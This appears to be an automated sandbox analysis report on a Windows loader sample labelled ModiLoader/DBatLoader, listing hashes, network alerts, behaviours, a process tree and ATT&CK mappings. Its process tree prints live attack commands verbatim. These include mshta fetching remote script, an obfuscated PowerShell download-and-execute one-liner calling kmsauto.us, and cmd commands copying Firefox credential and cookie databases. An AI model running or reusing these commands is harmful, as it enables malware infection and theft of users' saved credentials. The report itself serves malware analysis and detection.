Resubmissions

30-08-2021 15:07

210830-pwc1zfadk2 10

29-08-2021 05:12

210829-rapxwhlw4j 10

Analysis

  • max time kernel
    1798s
  • max time network
    1825s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    30-08-2021 15:07

General

  • Target

    006b91eb_IHyB_31ECD.exe

  • Size

    1010KB

  • MD5

    006b91eb6fe52d68af0c7e6b6ee0cdf5

  • SHA1

    a797f0062757264d9ed96fb16dbbe1f997891cb4

  • SHA256

    2181fc561eed3985e3f6922bfc50bb1a761377874ab0e86344bdc74505ed8f5c

  • SHA512

    3318ae6b954591db13537c8c04630a9914cdd51bfd4ef7c372f7bfb2cd33f572d06041ed99b97ed44796a3654891e444598ab15a102d86efa7ae9a80afccc634

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://kmsauto.us/ra/ALL.txt

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://kmsauto.us/ALL.txt

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • suricata: ET MALWARE PE EXE or DLL Windows file download Text

    suricata: ET MALWARE PE EXE or DLL Windows file download Text

  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

  • suricata: ET MALWARE Win32/Delf.BLL Variant CnC Activity (Inbound)

    suricata: ET MALWARE Win32/Delf.BLL Variant CnC Activity (Inbound)

  • suricata: ET MALWARE Win32/Delf.BLL Variant CnC Activity (Outbound)

    suricata: ET MALWARE Win32/Delf.BLL Variant CnC Activity (Outbound)

  • ModiLoader First Stage 3 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\006b91eb_IHyB_31ECD.exe
    "C:\Users\Admin\AppData\Local\Temp\006b91eb_IHyB_31ECD.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Users\Admin\AppData\Local\Temp\kMXy9izc.com
      "C:\Users\Admin\AppData\Local\Temp\kMXy9izc.com"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:652
      • C:\Windows\system32\cmd.exe
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1D31.tmp\1D32.tmp\1D33.bat C:\Users\Admin\AppData\Local\Temp\kMXy9izc.com"
        3⤵
          PID:928
      • C:\Users\Admin\AppData\Local\Temp\04WWd0fO.com
        "C:\Users\Admin\AppData\Local\Temp\04WWd0fO.com"
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:672
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt
          3⤵
          • Blocklisted process makes network request
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1828
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:560
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              #cmd
              5⤵
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious use of WriteProcessMemory
              PID:1264
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\profiles.ini C:\Users\Admin\AppData\Local\Temp\259373861.tmp"
                6⤵
                  PID:396
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/o7w2cnti.default-release\key4.db C:\Users\Admin\AppData\Local\Temp\259374407.tmp"
                  6⤵
                    PID:1052
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/o7w2cnti.default-release\cert9.db C:\Users\Admin\AppData\Local\Temp\259374734.tmp"
                    6⤵
                      PID:1336
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/o7w2cnti.default-release\prefs.js C:\Users\Admin\AppData\Local\Temp\259375046.tmp"
                      6⤵
                        PID:2024
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/o7w2cnti.default-release\cookies.sqlite C:\Users\Admin\AppData\Local\Temp\259375421.tmp"
                        6⤵
                          PID:296
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Local\Temp\259375421.tmp C:\Users\Admin\AppData\Local\Temp\259375889.tmp"
                          6⤵
                            PID:872
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\profiles.ini C:\Users\Admin\AppData\Local\Temp\259376232.tmp"
                            6⤵
                              PID:1712
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/o7w2cnti.default-release\key4.db C:\Users\Admin\AppData\Local\Temp\259376700.tmp"
                              6⤵
                                PID:1660
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/o7w2cnti.default-release\cert9.db C:\Users\Admin\AppData\Local\Temp\259377090.tmp"
                                6⤵
                                  PID:1576
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles/o7w2cnti.default-release\prefs.js C:\Users\Admin\AppData\Local\Temp\259377480.tmp"
                                  6⤵
                                    PID:112
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\\Profiles/o7w2cnti.default-release\cookies.sqlite C:\Users\Admin\AppData\Local\Temp\259377792.tmp"
                                    6⤵
                                      PID:1716
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C "copy /Y C:\Users\Admin\AppData\Local\Temp\259377792.tmp C:\Users\Admin\AppData\Local\Temp\259378229.tmp"
                                      6⤵
                                        PID:984
                              • C:\Users\Admin\AppData\Local\Temp\JClAnUMc.com
                                "C:\Users\Admin\AppData\Local\Temp\JClAnUMc.com"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:916
                                • C:\Windows\System32\mshta.exe
                                  "C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt
                                  3⤵
                                  • Blocklisted process makes network request
                                  • Modifies Internet Explorer settings
                                  • Suspicious use of WriteProcessMemory
                                  PID:436
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
                                    4⤵
                                    • Blocklisted process makes network request
                                    • Suspicious use of SetThreadContext
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:1632
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      #cmd
                                      5⤵
                                      • Writes to the Master Boot Record (MBR)
                                      PID:1880

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Persistence

                            Bootkit

                            1
                            T1067

                            Defense Evasion

                            Modify Registry

                            1
                            T1112

                            Credential Access

                            Credentials in Files

                            1
                            T1081

                            Discovery

                            System Information Discovery

                            2
                            T1082

                            Query Registry

                            1
                            T1012

                            Collection

                            Data from Local System

                            1
                            T1005

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                              MD5

                              635be0d08bf2020d2056bc3b494824fb

                              SHA1

                              57e3627e4146d773118d780c53cfb667a63d9f36

                              SHA256

                              de2a907397ce1db88d42b7bbec2c94d32ecd04a7a3c013d77c40540b086ce301

                              SHA512

                              a7e7a47aa4fadee21a2fb813260187beccfad8a7afcf305842099e7df02bc70937189cc1d81d163d6f44aba432fe9fe0bb3a5e30e7a6b4bb78cdcb2866719a18

                            • C:\Users\Admin\AppData\Local\Temp\04WWd0fO.com
                              MD5

                              d38aea02881ff45b60e6b2c11cd44916

                              SHA1

                              ab4d6992c292931c297ca55d3d2ee34df64b7f7b

                              SHA256

                              aa7ff8badcffdff66df6d30bde51b6e3c960be0a3719b73d3875af8e1173bd94

                              SHA512

                              c42fc67b08e130e2ea188328c7dbb69be6ae8c575cb79301117bbc22c4b292c59e0f186e25443e394fa36b34122c347c32e85d73716949812c3798880071ee7f

                            • C:\Users\Admin\AppData\Local\Temp\04WWd0fO.com
                              MD5

                              d38aea02881ff45b60e6b2c11cd44916

                              SHA1

                              ab4d6992c292931c297ca55d3d2ee34df64b7f7b

                              SHA256

                              aa7ff8badcffdff66df6d30bde51b6e3c960be0a3719b73d3875af8e1173bd94

                              SHA512

                              c42fc67b08e130e2ea188328c7dbb69be6ae8c575cb79301117bbc22c4b292c59e0f186e25443e394fa36b34122c347c32e85d73716949812c3798880071ee7f

                            • C:\Users\Admin\AppData\Local\Temp\1D31.tmp\1D32.tmp\1D33.bat
                              MD5

                              4daac34f17ecb3f09ce92bf60d62144a

                              SHA1

                              73898316bf67ab815528d4996e7f04185297baa8

                              SHA256

                              3f4f8c7e86bcc0432e2835771ae63fbc2b226be760c3190a96dcbe453cbbcb9d

                              SHA512

                              09f5fc715324dae244c229673cc2a86e93ade56ecd841c1b430389322b6e6d259debd852cb1d6b260c2a27aa2086f16d16ca9be81b1ac69ecbb0ea1c399a0bd3

                            • C:\Users\Admin\AppData\Local\Temp\259373861.tmp
                              MD5

                              9434b4d5253a3d96d6c0920de46bdcff

                              SHA1

                              a25158fdf825cf3944f95bacc7853860122fa29d

                              SHA256

                              6185a43c5129c624bba326d066bd6afdbb8f040ee3eece7a58f12fa09216bc22

                              SHA512

                              5ad5f374c5bc83af57b8737f415d444e2057205fc1a09e7410d311b46d84ba539248c232aee032b242aaa32ff3569bd202f9fe4741a43808a9ece8795ae2ec6f

                            • C:\Users\Admin\AppData\Local\Temp\259375421.tmp
                              MD5

                              89d4b62651fa5c864b12f3ea6b1521cb

                              SHA1

                              570d48367b6b66ade9900a9f22d67d67a8fb2081

                              SHA256

                              22f1159db346d2cc8f4fa544796cc9d243a5737110a17d8e3755a2448404ce70

                              SHA512

                              e6d3109c5e2aef98a63f42eebe3b10feedb1a8c81d7823380553f84d2d6585f328c18f02e72c3e5c98ace7ffedfb6214a4ea6c87e85cefceada8e630f8df61ff

                            • C:\Users\Admin\AppData\Local\Temp\259375889.tmp
                              MD5

                              89d4b62651fa5c864b12f3ea6b1521cb

                              SHA1

                              570d48367b6b66ade9900a9f22d67d67a8fb2081

                              SHA256

                              22f1159db346d2cc8f4fa544796cc9d243a5737110a17d8e3755a2448404ce70

                              SHA512

                              e6d3109c5e2aef98a63f42eebe3b10feedb1a8c81d7823380553f84d2d6585f328c18f02e72c3e5c98ace7ffedfb6214a4ea6c87e85cefceada8e630f8df61ff

                            • C:\Users\Admin\AppData\Local\Temp\259376232.tmp
                              MD5

                              9434b4d5253a3d96d6c0920de46bdcff

                              SHA1

                              a25158fdf825cf3944f95bacc7853860122fa29d

                              SHA256

                              6185a43c5129c624bba326d066bd6afdbb8f040ee3eece7a58f12fa09216bc22

                              SHA512

                              5ad5f374c5bc83af57b8737f415d444e2057205fc1a09e7410d311b46d84ba539248c232aee032b242aaa32ff3569bd202f9fe4741a43808a9ece8795ae2ec6f

                            • C:\Users\Admin\AppData\Local\Temp\259377792.tmp
                              MD5

                              89d4b62651fa5c864b12f3ea6b1521cb

                              SHA1

                              570d48367b6b66ade9900a9f22d67d67a8fb2081

                              SHA256

                              22f1159db346d2cc8f4fa544796cc9d243a5737110a17d8e3755a2448404ce70

                              SHA512

                              e6d3109c5e2aef98a63f42eebe3b10feedb1a8c81d7823380553f84d2d6585f328c18f02e72c3e5c98ace7ffedfb6214a4ea6c87e85cefceada8e630f8df61ff

                            • C:\Users\Admin\AppData\Local\Temp\259378229.tmp
                              MD5

                              89d4b62651fa5c864b12f3ea6b1521cb

                              SHA1

                              570d48367b6b66ade9900a9f22d67d67a8fb2081

                              SHA256

                              22f1159db346d2cc8f4fa544796cc9d243a5737110a17d8e3755a2448404ce70

                              SHA512

                              e6d3109c5e2aef98a63f42eebe3b10feedb1a8c81d7823380553f84d2d6585f328c18f02e72c3e5c98ace7ffedfb6214a4ea6c87e85cefceada8e630f8df61ff

                            • C:\Users\Admin\AppData\Local\Temp\JClAnUMc.com
                              MD5

                              b48dea0c642487df2482ab8fa55bb923

                              SHA1

                              50b00f687892a656319aefcecba535459e2d8a2d

                              SHA256

                              0dfe7a93ff40834c072c7fdd9381771b1086b67f545fa83c766b2d67a911e47b

                              SHA512

                              2b57678d9817fbc42c5d2f9e8b2cf0ff12b67882cc18e624422857be950810a4ea63c857700d7cf5a91ea66ed6a5074a3bfab6eff883c66457db8c611bde6e16

                            • C:\Users\Admin\AppData\Local\Temp\JClAnUMc.com
                              MD5

                              b48dea0c642487df2482ab8fa55bb923

                              SHA1

                              50b00f687892a656319aefcecba535459e2d8a2d

                              SHA256

                              0dfe7a93ff40834c072c7fdd9381771b1086b67f545fa83c766b2d67a911e47b

                              SHA512

                              2b57678d9817fbc42c5d2f9e8b2cf0ff12b67882cc18e624422857be950810a4ea63c857700d7cf5a91ea66ed6a5074a3bfab6eff883c66457db8c611bde6e16

                            • C:\Users\Admin\AppData\Local\Temp\kMXy9izc.com
                              MD5

                              1f460870b7a0a5979925cef15b0ca8ee

                              SHA1

                              4c5ac8f5ead53e0ba504c20c238e8f9fb3e435e6

                              SHA256

                              7f1db23c8550c2baf0fc007b2ebf7532ceacb3e8f38d8edfb29b250c6fed5273

                              SHA512

                              909826c719b23b4efd37fb53b0700394c398ff8da75f46833c70db16081121d22fd573c4133723f45c71f0b377ad458764140484329f07360a643263ac0ff2c0

                            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                              MD5

                              417fc8f25e3e13bd81de453bd1b79af7

                              SHA1

                              bf4f262ba9dffe7d5116954f9213e011e0803c8d

                              SHA256

                              9f8599a4287d6531e8f52e5dfc6e5cf812ae05b20639720ae7fadbce1b217e04

                              SHA512

                              f758e00315f9e849431e736a84a30d045800412ff2aef502ab613465c473c577ce1daef5d3c72da5ef644b05867527fa0cd58ac4344e5a9bfdc40f1527f6ce79

                            • C:\Users\Public\ Microsoft.ps1
                              MD5

                              d41d8cd98f00b204e9800998ecf8427e

                              SHA1

                              da39a3ee5e6b4b0d3255bfef95601890afd80709

                              SHA256

                              e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                              SHA512

                              cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                            • \Users\Admin\AppData\Local\Temp\libeay32.dll
                              MD5

                              fa5def992198121d4bb5ff3bde39fdc9

                              SHA1

                              f684152c245cc708fbaf4d1c0472d783b26c5b18

                              SHA256

                              5264a4a478383f501961f2bd9beb1f77a43a487b76090561bba2cbfe951e5305

                              SHA512

                              4589382a71cd3a577b83bab4a0209e72e02f603e7da6ef3175b6a74bd958e70a891091dbdff4be0725baca2d665470594b03f074983b3ed3242e5cd04783fdba

                            • \Users\Admin\AppData\Local\Temp\sqlite3.dll
                              MD5

                              834cd1be9a842cd06714ffc15f3b69c5

                              SHA1

                              56abf881d5cac709182f9e1e5ec1d975f378d1f6

                              SHA256

                              ce580f987d9dd73d035ed44ae17fb4c7ed5e502f7aff3f6b19142c7d710cdd05

                              SHA512

                              ad65ac34f0b89a79f46785b840e579db17080e22b3b2bb1986eb10026341e06f3626d3198eecfb6689acf5b87b2a7d07550ead4202d581f93c7745bd3cca38c5

                            • memory/112-128-0x0000000000000000-mapping.dmp
                            • memory/296-118-0x0000000000000000-mapping.dmp
                            • memory/396-113-0x0000000000000000-mapping.dmp
                            • memory/436-77-0x0000000000000000-mapping.dmp
                            • memory/560-99-0x000000001C6E0000-0x000000001C6E1000-memory.dmp
                              Filesize

                              4KB

                            • memory/560-89-0x000000001AAD0000-0x000000001AAD2000-memory.dmp
                              Filesize

                              8KB

                            • memory/560-90-0x000000001AAD4000-0x000000001AAD6000-memory.dmp
                              Filesize

                              8KB

                            • memory/560-94-0x0000000002370000-0x0000000002371000-memory.dmp
                              Filesize

                              4KB

                            • memory/560-96-0x000000001B400000-0x000000001B401000-memory.dmp
                              Filesize

                              4KB

                            • memory/560-85-0x0000000002760000-0x0000000002761000-memory.dmp
                              Filesize

                              4KB

                            • memory/560-81-0x0000000002620000-0x0000000002621000-memory.dmp
                              Filesize

                              4KB

                            • memory/560-82-0x000000001AB50000-0x000000001AB51000-memory.dmp
                              Filesize

                              4KB

                            • memory/560-111-0x00000000026D0000-0x00000000026D1000-memory.dmp
                              Filesize

                              4KB

                            • memory/560-79-0x0000000000000000-mapping.dmp
                            • memory/652-61-0x0000000000000000-mapping.dmp
                            • memory/652-63-0x0000000075B31000-0x0000000075B33000-memory.dmp
                              Filesize

                              8KB

                            • memory/672-66-0x0000000000000000-mapping.dmp
                            • memory/672-69-0x0000000000030000-0x0000000000031000-memory.dmp
                              Filesize

                              4KB

                            • memory/872-119-0x0000000000000000-mapping.dmp
                            • memory/916-72-0x0000000000000000-mapping.dmp
                            • memory/916-75-0x0000000000D30000-0x0000000000D31000-memory.dmp
                              Filesize

                              4KB

                            • memory/928-64-0x0000000000000000-mapping.dmp
                            • memory/984-130-0x0000000000000000-mapping.dmp
                            • memory/1052-115-0x0000000000000000-mapping.dmp
                            • memory/1100-60-0x000007FEFC391000-0x000007FEFC393000-memory.dmp
                              Filesize

                              8KB

                            • memory/1264-123-0x0000000003F10000-0x0000000003FB7000-memory.dmp
                              Filesize

                              668KB

                            • memory/1264-112-0x0000000000400000-0x000000000064F000-memory.dmp
                              Filesize

                              2.3MB

                            • memory/1264-109-0x0000000000632830-mapping.dmp
                            • memory/1264-108-0x0000000000400000-0x000000000064F000-memory.dmp
                              Filesize

                              2.3MB

                            • memory/1336-116-0x0000000000000000-mapping.dmp
                            • memory/1576-127-0x0000000000000000-mapping.dmp
                            • memory/1632-103-0x0000000002440000-0x0000000002441000-memory.dmp
                              Filesize

                              4KB

                            • memory/1632-102-0x0000000002420000-0x000000000243F000-memory.dmp
                              Filesize

                              124KB

                            • memory/1632-83-0x0000000000000000-mapping.dmp
                            • memory/1632-92-0x0000000002464000-0x0000000002466000-memory.dmp
                              Filesize

                              8KB

                            • memory/1632-91-0x0000000002460000-0x0000000002462000-memory.dmp
                              Filesize

                              8KB

                            • memory/1660-126-0x0000000000000000-mapping.dmp
                            • memory/1712-124-0x0000000000000000-mapping.dmp
                            • memory/1716-129-0x0000000000000000-mapping.dmp
                            • memory/1828-71-0x0000000000000000-mapping.dmp
                            • memory/1880-104-0x0000000000400000-0x0000000000459000-memory.dmp
                              Filesize

                              356KB

                            • memory/1880-105-0x0000000000443144-mapping.dmp
                            • memory/1880-106-0x0000000000400000-0x0000000000459000-memory.dmp
                              Filesize

                              356KB

                            • memory/2024-117-0x0000000000000000-mapping.dmp